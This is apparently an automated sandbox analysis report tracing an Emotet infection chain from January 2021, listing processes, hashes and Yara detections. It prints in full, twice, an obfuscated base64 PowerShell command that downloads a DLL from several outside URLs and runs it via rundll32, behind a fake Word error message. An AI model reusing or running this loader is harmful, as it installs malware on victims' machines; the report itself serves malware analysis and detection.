Reputation:	high

Chronological Activities

Analysis Process: cmd.exe PID: 2384 Parent PID: 1220

General

Start time:	16:33:35
Start date:	07/01/2021
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD IAAgAHMAZQB0AC0ASQB0AGUAbQAgAHYAYQBSAGkAYQBCAEwARQA6ADMAdgBDACAAIAAoAFsAVAB5AHAARQBdACgAIgB7ADUAfQB7ADAAfQB7ADEAfQB7ADMAfQB7ADIAfQB7ADQAfQAiACAALQBGACcAWQBTAHQAJwAsACcARQBtAC4ASQBvACcALAAnAEkAUgBFAGMAVABPACcALAAnAC4AZAAnACwAJwBSAHkAJwAsACcAUwAnACkAIAAgACkAOwAgACAAIABTAGUAVAAtAEkAVABFAG0AIAAgAFYAYQBSAGkAQQBCAGwARQA6ADUANAA5AGMAIAAgACgAIAAgAFsAdABZAHAAZQBdACgAIgB7ADQAfQB7ADEAfQB7ADAAfQB7ADIAfQB7ADMAfQAiACAALQBGACAAJwAuACcALAAnAHkAcwB0AEUAbQAnACwAJwBOAEUAVAAuAFMARQByAHYAaQBjAGUAUABPAGkAbgAnACwAJwBUAG0AQQBuAEEAZwBFAFIAJwAsACcAUwAnACkAIAApACAAOwAgACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACcAUwAnACsAKAAnAGkAbABlACcAKwAnAG4AJwArACcAdABsAHkAJwApACsAKAAnAEMAbwAnACsAJwBuACcAKQArACgAJwB0ACcAKwAnAGkAbgB1ACcAKQArACcAZQAnACkAOwAkAEEAOABoADIAcgB6AGIAPQAkAEYANgBfAEEAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAEwAOQA4AFAAOwAkAE0AMAAwAE8APQAoACcAQwAnACsAKAAnADgAMgAnACsAJwBaACcAKQApADsAIAAkADMAVgBDADoAOgAiAGMAcgBlAGEAYABUAGAARQBgAEQAYABpAFIAZQBjAFQAbwBSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAFQAeQBWACcAKwAnAFgAdAAnACsAJwBzAF8AbgAnACkAKwAoACcAbQBmAFQAeQBWAFAANAAnACsAJwAxACcAKQArACcAOAA4ACcAKwAoACcAcQBrACcAKwAnAFQAJwApACsAJwB5AFYAJwApACAALQByAEUAcABsAGEAQwBFACAAIAAoACcAVAAnACsAJwB5AFYAJwApACwAWwBDAEgAYQByAF0AOQAyACkAKQA7ACQAQwA0ADIATgA9ACgAKAAnAEMAJwArACcAMQAzACcAKQArACcARAAnACkAOwAgACAAKAAgAGwAUwAgACAAVgBBAFIAaQBBAGIATABlADoANQA0ADkAQwAgACkALgB2AGEATAB1AEUAOgA6ACIAcwBFAGMAVQBgAFIAYABpAFQAeQBwAFIAbwB0AGAAbwBgAGMATwBsACIAIAA9ACAAKAAnAFQAJwArACgAJwBsACcAKwAnAHMAMQAyACcAKQApADsAJABEADcANwBZAD0AKAAnAFoAOAAnACsAJwBfAFYAJwApADsAJABXAHYANgB4AGIANQA3ACAAPQAgACgAKAAnAFUAOQAnACsAJwA1ACcAKQArACcARAAnACkAOwAkAEgAMAAxAFYAPQAoACgAJwBHADkAJwArACcANgAnACkAKwAnAEgAJwApADsAJABUAHoAbwA3AHQAdwBsAD0AJABIAE8ATQBFACsAKAAoACcASgBqACcAKwAnAFcAJwArACgAJwBYAHQAJwArACcAcwBfAG4AbQAnACsAJwBmAEoAagBXAFAANAAnACsAJwAxADgAJwApACsAJwA4ACcAKwAoACcAcQAnACsAJwBrAEoAJwApACsAJwBqACcAKwAnAFcAJwApAC0AYwBSAGUAUABsAGEAQwBFACAAKAAnAEoAagAnACsAJwBXACcAKQAsAFsAQwBIAEEAUgBdADkAMgApACsAJABXAHYANgB4AGIANQA3ACsAKAAnAC4AJwArACgAJwBkACcAKwAnAGwAbAAnACkAKQA7ACQAWAA1ADYAUAA9ACgAJwBMACcAKwAoACcANgA3ACcAKwAnAFEAJwApACkAOwAkAFcAdABfADUAdwBrAGMAPQAoACcAXQBiACcAKwAoACcAMgBbAHMAJwArACcAOgAnACkAKwAoACcALwAnACsAJwAvACcAKwAnAGYAbQBjAGEAJwApACsAJwB2AC4AJwArACgAJwBjAG8AbQAnACsAJwAvACcAKQArACgAJwBpAG0AYQAnACsAJwBnAGUAcwAnACkAKwAnAC8ANwAnACsAKAAnAEYAVgA0AE4AJwArACcAZAAnACsAJwAvAEAAXQBiADIAWwBzACcAKQArACgAJwA6ACcAKwAnAC8ALwAnACkAKwAoACcAdABoAGUAcAByACcAKwAnAGEAJwApACsAKAAnAGoAaQAnACsAJwBuACcAKQArACgAJwBzAGgAJwArACcAZQBlAC4AJwApACsAKAAnAGMAJwArACcAbwBtAC8AbwB0ACcAKQArACgAJwBoACcAKwAnAGUAJwArACcAcgBmACcAKwAnAGkAbABlAHMAJwArACcALwB3AEEARgBQAC8AJwApACsAJwBAAF0AJwArACgAJwBiADIAWwBzADoAJwArACcALwAnACsAJwAvACcAKwAnAHcAdwB3AC4AcgBlAG0AbwB2ACcAKwAnAGUAcAAnACkAKwAoACcAYwB0AHIAJwArACcAbwAnACkAKwAnAGoAYQAnACsAKAAnAG4AJwArACcALgBjACcAKQArACgAJwBvAG0ALwB3ACcAKwAnAHAAJwApACsAKAAnAC0AJwArACcAYQBkAG0AJwApACsAJwBpAG4AJwArACcALwAnACsAKAAnAGEAawAnACsAJwAwACcAKQArACcAYwAnACsAJwBoACcAKwAoACcASAAnACsAJwAvAEAAJwArACcAXQBiADIAJwApACsAKAAnAFsAcwAnACsAJwA6ACcAKQArACgAJwAvAC8AdwAnACsAJwB3AHcALgAnACkAKwAnAGcAJwArACgAJwBlACcAKwAnAG8AcwByACcAKQArACcAdAAuACcAKwAoACcAYwAnACsAJwBvAG0AJwApACsAKAAnAC8AYQBxAHEAJwArACcAaAAnACkAKwAoACcAdwAnACsAJwBkAGEAcAAnACkAKwAoACcALwBsACcAKwAnADAALwBAACcAKwAnAF0AYgAyAFsAcwA6ACcAKQArACcALwAvACcAKwAnAGcAZQAnACsAJwBvACcAKwAnAGYAJwArACcAZgAnACsAJwBvAGcAJwArACgAJwBsACcAKwAnAGUAbQB1AHMAaQAnACsAJwBjAC4AJwApACsAJwBjACcAKwAoACcAbwAnACsAJwBtAC8AdwBwACcAKQArACgAJwAtACcAKwAnAGEAZAAnACkAKwAoACcAbQBpACcAKwAnAG4ALwAnACkAKwAoACcANwAnACsAJwBDADEAJwApACsAJwAxACcAKwAoACcAbwAnACsAJwBBAEMALwBAACcAKQArACgAJwBdAGIAJwArACcAMgBbAHMAJwApACsAKAAnADoAJwArACcALwAvACcAKQArACcAdwB3ACcAKwAoACcAdwAnACsAJwAuAGEAYwBoAHUAdABhACcAKwAnAG0AJwArACcAYQBuACcAKQArACcAYQBzACcAKwAoACcAYQAuACcAKwAnAGMAJwApACsAKAAnAG8AbQAnACsAJwAvAGcAJwApACsAJwBhAHIAJwArACcAbQBpACcAKwAnAG4AJwArACcALQAnACsAKAAnAHAAJwArACcAcgBvAC0AZgAnACkAKwAoACcAZQAnACsAJwBpADgAbwAvACcAKQArACgAJwBtAFcAJwArACcALwAnACkAKwAoACcAQABdACcAKwAnAGIAJwApACsAJwAyACcAKwAnAFsAcwAnACsAKAAnADoALwAnACsAJwAvAGoAbwBoAG4AJwApACsAJwBsAG8AJwArACcAdgAnACsAKAAnAGUAcwAnACsAJwBrAGkAJwApACsAJwBtACcAKwAnAC4AJwArACgAJwBjAG8AbQAvACcAKwAnAGEALwAnACsAJwBUACcAKQArACgAJwBmACcAKwAnAGYALwAnACkAKQAuACIAcgBgAGUAcABgAGwAYQBjAEUAIgAoACgAKAAnAF0AYgAnACsAJwAyACcAKQArACcAWwBzACcAKQAsACgAWwBhAHIAcgBhAHkAXQAoACcAcwBkACcALAAnAHMAdwAnACkALAAoACcAaAAnACsAKAAnAHQAdAAnACsAJwBwACcAKQApACwAJwAzAGQAJwApAFsAMQBdACkALgAiAHMAcABMAGAASQB0ACIAKAAkAFgAMwBfAEEAIAArACAAJABBADgAaAAyAHIAegBiACAAKwAgACQASgA4ADQATgApADsAJABJAF8AXwBSAD0AKAAnAEYAXwAnACsAJwA1AE0AJwApADsAZgBvAHIAZQBhAGMAaAAgACgAJABOAHIAaQB0ADMAZABrACAAaQBuACAAJABXAHQAXwA1AHcAawBjACkAewB0AHIAeQB7ACgAJgAoACcATgBlAHcALQBPAGIAJwArACcAagAnACsAJwBlAGMAdAAnACkAIABTAHkAUwBUAEUATQAuAE4AZQBUAC4AdwBFAEIAYwBMAEkARQBOAHQAKQAuACIAZABPAFcAYABOAGAATABvAGEAZABGAGkATABFACIAKAAkAE4AcgBpAHQAMwBkAGsALAAgACQAVAB6AG8ANwB0AHcAbAApADsAJABKADIANABVAD0AKAAnAFAAJwArACgAJwAzACcAKwAnADUATQAnACkAKQA7AEkAZgAgACgAKAAuACgAJwBHAGUAJwArACcAdAAtAEkAdABlAG0AJwApACAAJABUAHoAbwA3AHQAdwBsACkALgAiAEwAYABlAG4AZwBUAEgAIgAgAC0AZwBlACAAMwAwADcANQA1ACkAIAB7AC4AKAAnAHIAdQBuACcAKwAnAGQAbABsADMAMgAnACkAIAAkAFQAegBvADcAdAB3AGwALAAoACcAQwBvACcAKwAoACcAbgB0AHIAbwBsAF8AJwArACcAUgB1ACcAKQArACgAJwBuAEQATAAnACsAJwBMACcAKQApAC4AIgB0AG8AYABTAFQAUgBpAE4AZwAiACgAKQA7ACQARgA5ADEAWQA9ACgAJwBYACcAKwAoACcAMQAnACsAJwAwAEcAJwApACkAOwBiAHIAZQBhAGsAOwAkAE0AXwAxAFcAPQAoACcASwAnACsAKAAnADkAJwArACcANQBEACcAKQApAH0AfQBjAGEAdABjAGgAewB9AH0AJABDADEAXwBTAD0AKAAoACcAWAAnACsAJwAzADUAJwApACsAJwBLACcAKQA=
Imagebase:	0x4a440000
File size:	345088 bytes
MD5 hash:	5746BD7E255DD6A8AFA06F7C42C1BA41
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: msg.exe PID: 1692 Parent PID: 2384

General

Start time:	16:33:36
Start date:	07/01/2021
Path:	C:\Windows\System32\msg.exe
Wow64 process (32bit):	false
Commandline:	msg user /v Word experienced an error trying to open the file.
Imagebase:	0xff930000
File size:	26112 bytes
MD5 hash:	2214979661E779C3E3C33D4F14E6F3AC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: powershell.exe PID: 1628 Parent PID: 2384

General

Start time:	16:33:36
Start date:	07/01/2021
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	POwersheLL -w hidden -ENCOD IAAgAHMAZQB0AC0ASQB0AGUAbQAgAHYAYQBSAGkAYQBCAEwARQA6ADMAdgBDACAAIAAoAFsAVAB5AHAARQBdACgAIgB7ADUAfQB7ADAAfQB7ADEAfQB7ADMAfQB7ADIAfQB7ADQAfQAiACAALQBGACcAWQBTAHQAJwAsACcARQBtAC4ASQBvACcALAAnAEkAUgBFAGMAVABPACcALAAnAC4AZAAnACwAJwBSAHkAJwAsACcAUwAnACkAIAAgACkAOwAgACAAIABTAGUAVAAtAEkAVABFAG0AIAAgAFYAYQBSAGkAQQBCAGwARQA6ADUANAA5AGMAIAAgACgAIAAgAFsAdABZAHAAZQBdACgAIgB7ADQAfQB7ADEAfQB7ADAAfQB7ADIAfQB7ADMAfQAiACAALQBGACAAJwAuACcALAAnAHkAcwB0AEUAbQAnACwAJwBOAEUAVAAuAFMARQByAHYAaQBjAGUAUABPAGkAbgAnACwAJwBUAG0AQQBuAEEAZwBFAFIAJwAsACcAUwAnACkAIAApACAAOwAgACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACcAUwAnACsAKAAnAGkAbABlACcAKwAnAG4AJwArACcAdABsAHkAJwApACsAKAAnAEMAbwAnACsAJwBuACcAKQArACgAJwB0ACcAKwAnAGkAbgB1ACcAKQArACcAZQAnACkAOwAkAEEAOABoADIAcgB6AGIAPQAkAEYANgBfAEEAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAEwAOQA4AFAAOwAkAE0AMAAwAE8APQAoACcAQwAnACsAKAAnADgAMgAnACsAJwBaACcAKQApADsAIAAkADMAVgBDADoAOgAiAGMAcgBlAGEAYABUAGAARQBgAEQAYABpAFIAZQBjAFQAbwBSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAFQAeQBWACcAKwAnAFgAdAAnACsAJwBzAF8AbgAnACkAKwAoACcAbQBmAFQAeQBWAFAANAAnACsAJwAxACcAKQArACcAOAA4ACcAKwAoACcAcQBrACcAKwAnAFQAJwApACsAJwB5AFYAJwApACAALQByAEUAcABsAGEAQwBFACAAIAAoACcAVAAnACsAJwB5AFYAJwApACwAWwBDAEgAYQByAF0AOQAyACkAKQA7ACQAQwA0ADIATgA9ACgAKAAnAEMAJwArACcAMQAzACcAKQArACcARAAnACkAOwAgACAAKAAgAGwAUwAgACAAVgBBAFIAaQBBAGIATABlADoANQA0ADkAQwAgACkALgB2AGEATAB1AEUAOgA6ACIAcwBFAGMAVQBgAFIAYABpAFQAeQBwAFIAbwB0AGAAbwBgAGMATwBsACIAIAA9ACAAKAAnAFQAJwArACgAJwBsACcAKwAnAHMAMQAyACcAKQApADsAJABEADcANwBZAD0AKAAnAFoAOAAnACsAJwBfAFYAJwApADsAJABXAHYANgB4AGIANQA3ACAAPQAgACgAKAAnAFUAOQAnACsAJwA1ACcAKQArACcARAAnACkAOwAkAEgAMAAxAFYAPQAoACgAJwBHADkAJwArACcANgAnACkAKwAnAEgAJwApADsAJABUAHoAbwA3AHQAdwBsAD0AJABIAE8ATQBFACsAKAAoACcASgBqACcAKwAnAFcAJwArACgAJwBYAHQAJwArACcAcwBfAG4AbQAnACsAJwBmAEoAagBXAFAANAAnACsAJwAxADgAJwApACsAJwA4ACcAKwAoACcAcQAnACsAJwBrAEoAJwApACsAJwBqACcAKwAnAFcAJwApAC0AYwBSAGUAUABsAGEAQwBFACAAKAAnAEoAagAnACsAJwBXACcAKQAsAFsAQwBIAEEAUgBdADkAMgApACsAJABXAHYANgB4AGIANQA3ACsAKAAnAC4AJwArACgAJwBkACcAKwAnAGwAbAAnACkAKQA7ACQAWAA1ADYAUAA9ACgAJwBMACcAKwAoACcANgA3ACcAKwAnAFEAJwApACkAOwAkAFcAdABfADUAdwBrAGMAPQAoACcAXQBiACcAKwAoACcAMgBbAHMAJwArACcAOgAnACkAKwAoACcALwAnACsAJwAvACcAKwAnAGYAbQBjAGEAJwApACsAJwB2AC4AJwArACgAJwBjAG8AbQAnACsAJwAvACcAKQArACgAJwBpAG0AYQAnACsAJwBnAGUAcwAnACkAKwAnAC8ANwAnACsAKAAnAEYAVgA0AE4AJwArACcAZAAnACsAJwAvAEAAXQBiADIAWwBzACcAKQArACgAJwA6ACcAKwAnAC8ALwAnACkAKwAoACcAdABoAGUAcAByACcAKwAnAGEAJwApACsAKAAnAGoAaQAnACsAJwBuACcAKQArACgAJwBzAGgAJwArACcAZQBlAC4AJwApACsAKAAnAGMAJwArACcAbwBtAC8AbwB0ACcAKQArACgAJwBoACcAKwAnAGUAJwArACcAcgBmACcAKwAnAGkAbABlAHMAJwArACcALwB3AEEARgBQAC8AJwApACsAJwBAAF0AJwArACgAJwBiADIAWwBzADoAJwArACcALwAnACsAJwAvACcAKwAnAHcAdwB3AC4AcgBlAG0AbwB2ACcAKwAnAGUAcAAnACkAKwAoACcAYwB0AHIAJwArACcAbwAnACkAKwAnAGoAYQAnACsAKAAnAG4AJwArACcALgBjACcAKQArACgAJwBvAG0ALwB3ACcAKwAnAHAAJwApACsAKAAnAC0AJwArACcAYQBkAG0AJwApACsAJwBpAG4AJwArACcALwAnACsAKAAnAGEAawAnACsAJwAwACcAKQArACcAYwAnACsAJwBoACcAKwAoACcASAAnACsAJwAvAEAAJwArACcAXQBiADIAJwApACsAKAAnAFsAcwAnACsAJwA6ACcAKQArACgAJwAvAC8AdwAnACsAJwB3AHcALgAnACkAKwAnAGcAJwArACgAJwBlACcAKwAnAG8AcwByACcAKQArACcAdAAuACcAKwAoACcAYwAnACsAJwBvAG0AJwApACsAKAAnAC8AYQBxAHEAJwArACcAaAAnACkAKwAoACcAdwAnACsAJwBkAGEAcAAnACkAKwAoACcALwBsACcAKwAnADAALwBAACcAKwAnAF0AYgAyAFsAcwA6ACcAKQArACcALwAvACcAKwAnAGcAZQAnACsAJwBvACcAKwAnAGYAJwArACcAZgAnACsAJwBvAGcAJwArACgAJwBsACcAKwAnAGUAbQB1AHMAaQAnACsAJwBjAC4AJwApACsAJwBjACcAKwAoACcAbwAnACsAJwBtAC8AdwBwACcAKQArACgAJwAtACcAKwAnAGEAZAAnACkAKwAoACcAbQBpACcAKwAnAG4ALwAnACkAKwAoACcANwAnACsAJwBDADEAJwApACsAJwAxACcAKwAoACcAbwAnACsAJwBBAEMALwBAACcAKQArACgAJwBdAGIAJwArACcAMgBbAHMAJwApACsAKAAnADoAJwArACcALwAvACcAKQArACcAdwB3ACcAKwAoACcAdwAnACsAJwAuAGEAYwBoAHUAdABhACcAKwAnAG0AJwArACcAYQBuACcAKQArACcAYQBzACcAKwAoACcAYQAuACcAKwAnAGMAJwApACsAKAAnAG8AbQAnACsAJwAvAGcAJwApACsAJwBhAHIAJwArACcAbQBpACcAKwAnAG4AJwArACcALQAnACsAKAAnAHAAJwArACcAcgBvAC0AZgAnACkAKwAoACcAZQAnACsAJwBpADgAbwAvACcAKQArACgAJwBtAFcAJwArACcALwAnACkAKwAoACcAQABdACcAKwAnAGIAJwApACsAJwAyACcAKwAnAFsAcwAnACsAKAAnADoALwAnACsAJwAvAGoAbwBoAG4AJwApACsAJwBsAG8AJwArACcAdgAnACsAKAAnAGUAcwAnACsAJwBrAGkAJwApACsAJwBtACcAKwAnAC4AJwArACgAJwBjAG8AbQAvACcAKwAnAGEALwAnACsAJwBUACcAKQArACgAJwBmACcAKwAnAGYALwAnACkAKQAuACIAcgBgAGUAcABgAGwAYQBjAEUAIgAoACgAKAAnAF0AYgAnACsAJwAyACcAKQArACcAWwBzACcAKQAsACgAWwBhAHIAcgBhAHkAXQAoACcAcwBkACcALAAnAHMAdwAnACkALAAoACcAaAAnACsAKAAnAHQAdAAnACsAJwBwACcAKQApACwAJwAzAGQAJwApAFsAMQBdACkALgAiAHMAcABMAGAASQB0ACIAKAAkAFgAMwBfAEEAIAArACAAJABBADgAaAAyAHIAegBiACAAKwAgACQASgA4ADQATgApADsAJABJAF8AXwBSAD0AKAAnAEYAXwAnACsAJwA1AE0AJwApADsAZgBvAHIAZQBhAGMAaAAgACgAJABOAHIAaQB0ADMAZABrACAAaQBuACAAJABXAHQAXwA1AHcAawBjACkAewB0AHIAeQB7ACgAJgAoACcATgBlAHcALQBPAGIAJwArACcAagAnACsAJwBlAGMAdAAnACkAIABTAHkAUwBUAEUATQAuAE4AZQBUAC4AdwBFAEIAYwBMAEkARQBOAHQAKQAuACIAZABPAFcAYABOAGAATABvAGEAZABGAGkATABFACIAKAAkAE4AcgBpAHQAMwBkAGsALAAgACQAVAB6AG8ANwB0AHcAbAApADsAJABKADIANABVAD0AKAAnAFAAJwArACgAJwAzACcAKwAnADUATQAnACkAKQA7AEkAZgAgACgAKAAuACgAJwBHAGUAJwArACcAdAAtAEkAdABlAG0AJwApACAAJABUAHoAbwA3AHQAdwBsACkALgAiAEwAYABlAG4AZwBUAEgAIgAgAC0AZwBlACAAMwAwADcANQA1ACkAIAB7AC4AKAAnAHIAdQBuACcAKwAnAGQAbABsADMAMgAnACkAIAAkAFQAegBvADcAdAB3AGwALAAoACcAQwBvACcAKwAoACcAbgB0AHIAbwBsAF8AJwArACcAUgB1ACcAKQArACgAJwBuAEQATAAnACsAJwBMACcAKQApAC4AIgB0AG8AYABTAFQAUgBpAE4AZwAiACgAKQA7ACQARgA5ADEAWQA9ACgAJwBYACcAKwAoACcAMQAnACsAJwAwAEcAJwApACkAOwBiAHIAZQBhAGsAOwAkAE0AXwAxAFcAPQAoACcASwAnACsAKAAnADkAJwArACcANQBEACcAKQApAH0AfQBjAGEAdABjAGgAewB9AH0AJABDADEAXwBTAD0AKAAoACcAWAAnACsAJwAzADUAJwApACsAJwBLACcAKQA=
Imagebase:	0x13f270000
File size:	473600 bytes
MD5 hash:	852D67A27E454BD389FA7F02A8CBE23F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000005.00000002.2086257374.0000000001C56000.00000004.00000001.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000005.00000002.2086147176.0000000000336000.00000004.00000001.sdmp, Author: Florian Roth
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 2468 Parent PID: 1628

General

Start time:	16:33:40
Start date:	07/01/2021
Path:	C:\Windows\System32\rundll32.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\system32\rundll32.exe' C:\Users\user\Xts_nmf\P4188qk\U95D.dll Control_RunDLL
Imagebase:	0xff310000
File size:	45568 bytes
MD5 hash:	DD81D91FF3B0763C392422865C9AC12E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: rundll32.exe PID: 2296 Parent PID: 2468

General

Start time:	16:33:40
Start date:	07/01/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	'C:\Windows\system32\rundll32.exe' C:\Users\user\Xts_nmf\P4188qk\U95D.dll Control_RunDLL
Imagebase:	0xee0000
File size:	44544 bytes
MD5 hash:	51138BEEA3E2C21EC44D0932C71762A8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000007.00000002.2087899639.00000000001E0000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000007.00000002.2087918184.0000000000201000.00000020.00000001.sdmp, Author: Joe Security
Reputation:	moderate

Chronological Activities

Analysis Process: rundll32.exe PID: 2848 Parent PID: 2296

General

Start time:	16:33:41
Start date:	07/01/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Sfwveevpdqixuom\bsjtfkdrderxek.bnn',Control_RunDLL
Imagebase:	0xee0000
File size:	44544 bytes
MD5 hash:	51138BEEA3E2C21EC44D0932C71762A8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000008.00000002.2089448478.0000000000160000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000008.00000002.2089495530.0000000000181000.00000020.00000001.sdmp, Author: Joe Security
Reputation:	moderate

Chronological Activities

Analysis Process: rundll32.exe PID: 2684 Parent PID: 2848

General

Start time:	16:33:41
Start date:	07/01/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Vobicwh\otzfel.hzn',Control_RunDLL
Imagebase:	0xee0000
File size:	44544 bytes
MD5 hash:	51138BEEA3E2C21EC44D0932C71762A8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000009.00000002.2091105299.00000000001A0000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000009.00000002.2091148217.00000000001C1000.00000020.00000001.sdmp, Author: Joe Security
Reputation:	moderate

Chronological Activities

Analysis Process: rundll32.exe PID: 2880 Parent PID: 2684

General

Start time:	16:33:42
Start date:	07/01/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Uxgydceommtwiki\qzhrxsieatmrnj.xlc',Control_RunDLL
Imagebase:	0xee0000
File size:	44544 bytes
MD5 hash:	51138BEEA3E2C21EC44D0932C71762A8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000A.00000002.2092936438.00000000001A0000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000A.00000002.2092986854.0000000000251000.00000020.00000001.sdmp, Author: Joe Security
Reputation:	moderate

Chronological Activities

Analysis Process: rundll32.exe PID: 2884 Parent PID: 2880

General

Start time:	16:33:43
Start date:	07/01/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Bdzitbg\obtbak.jsi',Control_RunDLL
Imagebase:	0xee0000
File size:	44544 bytes
MD5 hash:	51138BEEA3E2C21EC44D0932C71762A8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000B.00000002.2095271889.00000000002C1000.00000020.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000B.00000002.2095249206.00000000002A0000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	moderate

Chronological Activities

Analysis Process: rundll32.exe PID: 2444 Parent PID: 2884

General

Start time:	16:33:44
Start date:	07/01/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Xewbyzlpihpnskgh\wwdzuofqhkcpmfa.gyu',Control_RunDLL
Imagebase:	0xee0000
File size:	44544 bytes
MD5 hash:	51138BEEA3E2C21EC44D0932C71762A8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000C.00000002.2095952053.00000000001B1000.00000020.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000C.00000002.2095884659.0000000000190000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	moderate

Chronological Activities

Analysis Process: rundll32.exe PID: 2408 Parent PID: 2444

General

Start time:	16:33:44
Start date:	07/01/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Qakdocqxk\cjwfvfif.ylv',Control_RunDLL
Imagebase:	0xee0000
File size:	44544 bytes
MD5 hash:	51138BEEA3E2C21EC44D0932C71762A8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000D.00000002.2097335111.00000000001A0000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000D.00000002.2097402342.00000000001C1000.00000020.00000001.sdmp, Author: Joe Security
Reputation:	moderate

Chronological Activities

Analysis Process: rundll32.exe PID: 2780 Parent PID: 2408

General

Start time:	16:33:45
Start date:	07/01/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Hutifyziasbygiy\qhmiqrfpmiryum.ywy',Control_RunDLL
Imagebase:	0xee0000
File size:	44544 bytes
MD5 hash:	51138BEEA3E2C21EC44D0932C71762A8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000E.00000002.2099058113.0000000000391000.00000020.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000E.00000002.2098697585.0000000000170000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	moderate

Chronological Activities

Analysis Process: rundll32.exe PID: 2976 Parent PID: 2780

General

Start time:	16:33:46
Start date:	07/01/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Tsbimf\rxvqt.dyw',Control_RunDLL
Imagebase:	0xee0000
File size:	44544 bytes
MD5 hash:	51138BEEA3E2C21EC44D0932C71762A8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000F.00000002.2100125404.0000000000210000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000F.00000002.2100172117.0000000000271000.00000020.00000001.sdmp, Author: Joe Security
Reputation:	moderate

Chronological Activities

